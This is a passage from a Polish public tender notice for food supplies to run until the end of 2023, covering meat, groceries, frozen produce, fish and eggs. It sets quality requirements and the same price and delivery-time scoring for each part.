<h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas na uzupełnienie braków lub wymiana towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mięso najlepszej jakości, świeże, nie rozmrażane, jędrne, pochodzące z produkcji krajowej, czyste, suche, o świeżym zapachu i barwie. Mięso wieprzowe powinno być jednolitego koloru, bez przebarwień, kolor od różowego do czerwonego, przekrojone mięso - jego konsystencja i zapach mają świadczyć o jego świeżości . Wędliny powinny być pakowane w atmosferze próżniowej. Termin przydatności produktów do spożycia ma być nie krótszy niż 14 dni od daty dostawy dla Zamawiającego - dla wędlin, natomiast dla mięs 5 dni . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert w zakresie poszczególnych kryteriów dokonana zostanie wg następujących <br/> zasad:<br/><br/>2. cena (X1), ocenie podlegać będzie cena brutto wyrażona w PLN <br/>skala pkt: 0-60<br/> najniższa oferowana cena <br/> (X1) ilość pkt przyznana danej ofercie = ------------------------------- x 60 pkt <br/> badana cena <br/><br/>2.1 Przy obliczaniu liczby punktów w kryterium: Godzina dostawy codziennie <br/>do godz. 07.30 . ( X2 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	Godzina dostawy po godz. 7.30 – 0 pkt<br/>•	Godzina dostawy do godz. 7.30 – 10 pkt<br/>•	Godzina dostawy do godz. 7.00 – 20 pkt<br/><br/> <br/>2.2.	Przy obliczaniu liczby punktów w kryterium czas dodatkowej dostawy lub uzupełnienie braku ( X3 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku powyżej 2 godzin – 0 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 2 godzin – 5 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 1 godziny – 10 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 0,5 godzin – 20 pkt<br/><br/><br/>Maksymalny dopuszczalny przez Zamawiającego czas wynosi 6 godzin od chwili zgłoszenia nieprawidłowości przez Zamawiającego (ustnie podczas odbioru dostawy lub telefonicznie, mailem). Wykonawca wskazuje w Formularzu ofertowym (zał. Nr 1 do SWZ) oferowany czas wymiany towaru na pełnowartościowy lub na uzupełnienie braku. Wykonawca winien zaoferować czas wymiany towaru w pełnych godzinach, w przypadku zaoferowania czasu <br/>z podaniem minut punktacja zostanie przyznana odpowiednio za wyższą ilość godzin, np. przy zaoferowaniu 2 godzin i 10 minut Zamawiający przyzna 0 pkt. <br/>Dostawa do Zamawiającego winna być dokonana maksymalnie do godz. 07.30. Zamawiający przyzna odpowiednie punkty według wskazań Wykonawcy w Formularzu ofertowym ( zał. Nr 1 do SWZ ). Wykonawca winien podać godziny dostawy wskazane w podpunkcie 2.1 . W przypadku zaoferowania godziny dostawy z podaniem minut , punktacja zostanie przyznana odpowiednio za późniejszą godzinę dostawy np.: przy zaoferowaniu godz. 07.15 zamawiający uzna to za godzinę 07.30. i przyzna 10 pkt. <br/><br/>3. Ocena punktowa przyznana ofercie (X) będzie sumą punktów przyznanych w ramach kryteriów oceny ofert i zostanie obliczona jako X = X1+X2+X3. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. <br/>4. Za najkorzystniejszą ofertę zostanie uznana oferta niepodlegająca odrzuceniu, która otrzyma największą ilość punktów zgodnie z kryteriami oceny ofert określonymi w pkt 1 oraz sposobem ich oceny, określonym w pkt 2.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa do godz. 07.30</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowa dostawa , uzupełnienie braków.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wszystkie artykuły muszą być oznakowane etykietą, na której będą widoczne: nazwa artykułu, nazwa producenta, skład produktu, alergeny, termin przydatności do spożycia. Długoterminowe produktu winny posiadać datę ważności do spożycia min 6m-cy od daty ich dostarczenia do Zamawiającego. Produkty sypkie powinny suche, I klasy, opakowania bez uszkodzeń . Makarony powinny być wyprodukowane z najwyższej jakości mąki durum , makaron który po ugotowaniu nie skleja się . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert w zakresie poszczególnych kryteriów dokonana zostanie wg następujących <br/> zasad:<br/><br/>2. cena (X1), ocenie podlegać będzie cena brutto wyrażona w PLN <br/>skala pkt: 0-60<br/> najniższa oferowana cena <br/> (X1) ilość pkt przyznana danej ofercie = ------------------------------- x 60 pkt <br/> badana cena <br/><br/>2.1 Przy obliczaniu liczby punktów w kryterium: Godzina dostawy codziennie <br/>do godz. 07.30 . ( X2 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	Godzina dostawy po godz. 7.30 – 0 pkt<br/>•	Godzina dostawy do godz. 7.30 – 10 pkt<br/>•	Godzina dostawy do godz. 7.00 – 20 pkt<br/><br/> <br/>2.2.	Przy obliczaniu liczby punktów w kryterium czas dodatkowej dostawy lub uzupełnienie braku ( X3 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku powyżej 2 godzin – 0 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 2 godzin – 5 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 1 godziny – 10 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 0,5 godzin – 20 pkt<br/><br/><br/>Maksymalny dopuszczalny przez Zamawiającego czas wynosi 6 godzin od chwili zgłoszenia nieprawidłowości przez Zamawiającego (ustnie podczas odbioru dostawy lub telefonicznie, mailem). Wykonawca wskazuje w Formularzu ofertowym (zał. Nr 1 do SWZ) oferowany czas wymiany towaru na pełnowartościowy lub na uzupełnienie braku. Wykonawca winien zaoferować czas wymiany towaru w pełnych godzinach, w przypadku zaoferowania czasu <br/>z podaniem minut punktacja zostanie przyznana odpowiednio za wyższą ilość godzin, np. przy zaoferowaniu 2 godzin i 10 minut Zamawiający przyzna 0 pkt. <br/>Dostawa do Zamawiającego winna być dokonana maksymalnie do godz. 07.30. Zamawiający przyzna odpowiednie punkty według wskazań Wykonawcy w Formularzu ofertowym ( zał. Nr 1 do SWZ ). Wykonawca winien podać godziny dostawy wskazane w podpunkcie 2.1 . W przypadku zaoferowania godziny dostawy z podaniem minut , punktacja zostanie przyznana odpowiednio za późniejszą godzinę dostawy np.: przy zaoferowaniu godz. 07.15 zamawiający uzna to za godzinę 07.30. i przyzna 10 pkt. <br/><br/>3. Ocena punktowa przyznana ofercie (X) będzie sumą punktów przyznanych w ramach kryteriów oceny ofert i zostanie obliczona jako X = X1+X2+X3. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. <br/>4. Za najkorzystniejszą ofertę zostanie uznana oferta niepodlegająca odrzuceniu, która otrzyma największą ilość punktów zgodnie z kryteriami oceny ofert określonymi w pkt 1 oraz sposobem ich oceny, określonym w pkt 2.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa do godz. 07.30</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowa dostawa lub uzupełnienie braków</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Mrożone owoce i warzywa najlepszej jakości, I klasy, o ksztacie i barwie charakterystycznej dla danego produktu, sypkie nie zbrylone. Wygląd ich nie może świadczyć o wcześniejszym rozmrożeniu i ponownym zamrożeniu. Mrożonki muszą posiadać termin przydatności do spożycia nie krótszy niż 4 miesiące od daty dostawy do Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331170-9 - Warzywa mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert w zakresie poszczególnych kryteriów dokonana zostanie wg następujących <br/> zasad:<br/><br/>2. cena (X1), ocenie podlegać będzie cena brutto wyrażona w PLN <br/>skala pkt: 0-60<br/> najniższa oferowana cena <br/> (X1) ilość pkt przyznana danej ofercie = ------------------------------- x 60 pkt <br/> badana cena <br/><br/>2.1 Przy obliczaniu liczby punktów w kryterium: Godzina dostawy codziennie <br/>do godz. 07.30 . ( X2 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	Godzina dostawy po godz. 7.30 – 0 pkt<br/>•	Godzina dostawy do godz. 7.30 – 10 pkt<br/>•	Godzina dostawy do godz. 7.00 – 20 pkt<br/><br/> <br/>2.2.	Przy obliczaniu liczby punktów w kryterium czas dodatkowej dostawy lub uzupełnienie braku ( X3 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku powyżej 2 godzin – 0 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 2 godzin – 5 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 1 godziny – 10 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 0,5 godzin – 20 pkt<br/><br/><br/>Maksymalny dopuszczalny przez Zamawiającego czas wynosi 6 godzin od chwili zgłoszenia nieprawidłowości przez Zamawiającego (ustnie podczas odbioru dostawy lub telefonicznie, mailem). Wykonawca wskazuje w Formularzu ofertowym (zał. Nr 1 do SWZ) oferowany czas wymiany towaru na pełnowartościowy lub na uzupełnienie braku. Wykonawca winien zaoferować czas wymiany towaru w pełnych godzinach, w przypadku zaoferowania czasu <br/>z podaniem minut punktacja zostanie przyznana odpowiednio za wyższą ilość godzin, np. przy zaoferowaniu 2 godzin i 10 minut Zamawiający przyzna 0 pkt. <br/>Dostawa do Zamawiającego winna być dokonana maksymalnie do godz. 07.30. Zamawiający przyzna odpowiednie punkty według wskazań Wykonawcy w Formularzu ofertowym ( zał. Nr 1 do SWZ ). Wykonawca winien podać godziny dostawy wskazane w podpunkcie 2.1 . W przypadku zaoferowania godziny dostawy z podaniem minut , punktacja zostanie przyznana odpowiednio za późniejszą godzinę dostawy np.: przy zaoferowaniu godz. 07.15 zamawiający uzna to za godzinę 07.30. i przyzna 10 pkt. <br/><br/>3. Ocena punktowa przyznana ofercie (X) będzie sumą punktów przyznanych w ramach kryteriów oceny ofert i zostanie obliczona jako X = X1+X2+X3. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. <br/>4. Za najkorzystniejszą ofertę zostanie uznana oferta niepodlegająca odrzuceniu, która otrzyma największą ilość punktów zgodnie z kryteriami oceny ofert określonymi w pkt 1 oraz sposobem ich oceny, określonym w pkt 2.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa do godz. 07.30</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowa dostawa lub uzupełnienie braków</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Ryby powinny być najwyższej jakości, pierwszego gatunku. Mrożone ryby - pojedyncze filety powinny być rozdzielone folią , nie mogą nosić oznak rozmrożenia i ponownego zamrożenia. Ryby mrożone muszą być tak twarde aby zgięcie ich było niemożliwe. Końcówki i brzegi filetów nie mogą mieć widocznego wysuszenia, nienaturalnego przebarwienia i nieświeżego wyglądu. Makrela wędzona powinna być hermetycznie zamknięta. Termin przydatności do spożycia ryby mrożonej nie krótszy niż 4 miesiące od daty dostawy towaru do Zamawiającego. Termin przydatności makreli wędzonej nie krótszy niż 21 dni od daty dostawy do Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15200000-0 - Ryby przetworzone i konserwowane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert w zakresie poszczególnych kryteriów dokonana zostanie wg następujących <br/> zasad:<br/><br/>2. cena (X1), ocenie podlegać będzie cena brutto wyrażona w PLN <br/>skala pkt: 0-60<br/> najniższa oferowana cena <br/> (X1) ilość pkt przyznana danej ofercie = ------------------------------- x 60 pkt <br/> badana cena <br/><br/>2.1 Przy obliczaniu liczby punktów w kryterium: Godzina dostawy codziennie <br/>do godz. 07.30 . ( X2 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	Godzina dostawy po godz. 7.30 – 0 pkt<br/>•	Godzina dostawy do godz. 7.30 – 10 pkt<br/>•	Godzina dostawy do godz. 7.00 – 20 pkt<br/><br/> <br/>2.2.	Przy obliczaniu liczby punktów w kryterium czas dodatkowej dostawy lub uzupełnienie braku ( X3 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku powyżej 2 godzin – 0 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 2 godzin – 5 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 1 godziny – 10 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 0,5 godzin – 20 pkt<br/><br/><br/>Maksymalny dopuszczalny przez Zamawiającego czas wynosi 6 godzin od chwili zgłoszenia nieprawidłowości przez Zamawiającego (ustnie podczas odbioru dostawy lub telefonicznie, mailem). Wykonawca wskazuje w Formularzu ofertowym (zał. Nr 1 do SWZ) oferowany czas wymiany towaru na pełnowartościowy lub na uzupełnienie braku. Wykonawca winien zaoferować czas wymiany towaru w pełnych godzinach, w przypadku zaoferowania czasu <br/>z podaniem minut punktacja zostanie przyznana odpowiednio za wyższą ilość godzin, np. przy zaoferowaniu 2 godzin i 10 minut Zamawiający przyzna 0 pkt. <br/>Dostawa do Zamawiającego winna być dokonana maksymalnie do godz. 07.30. Zamawiający przyzna odpowiednie punkty według wskazań Wykonawcy w Formularzu ofertowym ( zał. Nr 1 do SWZ ). Wykonawca winien podać godziny dostawy wskazane w podpunkcie 2.1 . W przypadku zaoferowania godziny dostawy z podaniem minut , punktacja zostanie przyznana odpowiednio za późniejszą godzinę dostawy np.: przy zaoferowaniu godz. 07.15 zamawiający uzna to za godzinę 07.30. i przyzna 10 pkt. <br/><br/>3. Ocena punktowa przyznana ofercie (X) będzie sumą punktów przyznanych w ramach kryteriów oceny ofert i zostanie obliczona jako X = X1+X2+X3. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. <br/>4. Za najkorzystniejszą ofertę zostanie uznana oferta niepodlegająca odrzuceniu, która otrzyma największą ilość punktów zgodnie z kryteriami oceny ofert określonymi w pkt 1 oraz sposobem ich oceny, określonym w pkt 2.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa do godz. 07.30</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowa dostawa lub uzupełnienie braków</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zgodnie z klasą I A, jaja świeże,czyste, skorupki jaj oraz opakawanie w jakim są pakowane - nie uszkodzone. Jaja muszą być oznakowane weterynaryjnym numerem zakładu produkcyjnego, termin spożycia w dniu dostawy do Zamawiającego nie krótszy niż 21 dni. Towar musi spełniać normy techniczne i jakościowe jakie wynikają z obowiązujących przepisów polskiego prawa dla produktów żywnościowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert w zakresie poszczególnych kryteriów dokonana zostanie wg następujących <br/> zasad:<br/><br/>2. cena (X1), ocenie podlegać będzie cena brutto wyrażona w PLN <br/>skala pkt: 0-60<br/> najniższa oferowana cena <br/> (X1) ilość pkt przyznana danej ofercie = ------------------------------- x 60 pkt <br/> badana cena <br/><br/>2.1 Przy obliczaniu liczby punktów w kryterium: Godzina dostawy codziennie <br/>do godz. 07.30 . ( X2 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	Godzina dostawy po godz. 7.30 – 0 pkt<br/>•	Godzina dostawy do godz. 7.30 – 10 pkt<br/>•	Godzina dostawy do godz. 7.00 – 20 pkt<br/><br/> <br/>2.2.	Przy obliczaniu liczby punktów w kryterium czas dodatkowej dostawy lub uzupełnienie braku ( X3 ) Zamawiający zastosuje następujące wyliczenie:<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku powyżej 2 godzin – 0 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 2 godzin – 5 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 1 godziny – 10 pkt<br/>•	za oferowany czas dodatkowej dostawy lub uzupełnienie braku do 0,5 godzin – 20 pkt<br/><br/><br/>Maksymalny dopuszczalny przez Zamawiającego czas wynosi 6 godzin od chwili zgłoszenia nieprawidłowości przez Zamawiającego (ustnie podczas odbioru dostawy lub telefonicznie, mailem). Wykonawca wskazuje w Formularzu ofertowym (zał. Nr 1 do SWZ) oferowany czas wymiany towaru na pełnowartościowy lub na uzupełnienie braku. Wykonawca winien zaoferować czas wymiany towaru w pełnych godzinach, w przypadku zaoferowania czasu <br/>z podaniem minut punktacja zostanie przyznana odpowiednio za wyższą ilość godzin, np. przy zaoferowaniu 2 godzin i 10 minut Zamawiający przyzna 0 pkt. <br/>Dostawa do Zamawiającego winna być dokonana maksymalnie do godz. 07.30. Zamawiający przyzna odpowiednie punkty według wskazań Wykonawcy w Formularzu ofertowym ( zał. Nr 1 do SWZ ). Wykonawca winien podać godziny dostawy wskazane w podpunkcie 2.1 . W przypadku zaoferowania godziny dostawy z podaniem minut , punktacja zostanie przyznana odpowiednio za późniejszą godzinę dostawy np.: przy zaoferowaniu godz. 07.15 zamawiający uzna to za godzinę 07.30. i przyzna 10 pkt. <br/><br/>3. Ocena punktowa przyznana ofercie (X) będzie sumą punktów przyznanych w ramach kryteriów oceny ofert i zostanie obliczona jako X = X1+X2+X3. Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. <br/>4. Za najkorzystniejszą ofertę zostanie uznana oferta niepodlegająca odrzuceniu, która otrzyma największą ilość punktów zgodnie z kryteriami oceny ofert określonymi w pkt 1 oraz sposobem ich oceny, określonym w pkt 2.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa do godz. 07.30</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowa dostawa lub uzupełnienie braków</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu.<br/>2. Wykonawca zostanie wykluczony z postępowania, jeżeli zajdą okoliczności określone w art. 108 ust.1 ustawy Prawo zamówień publicznych lub art. 7 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na 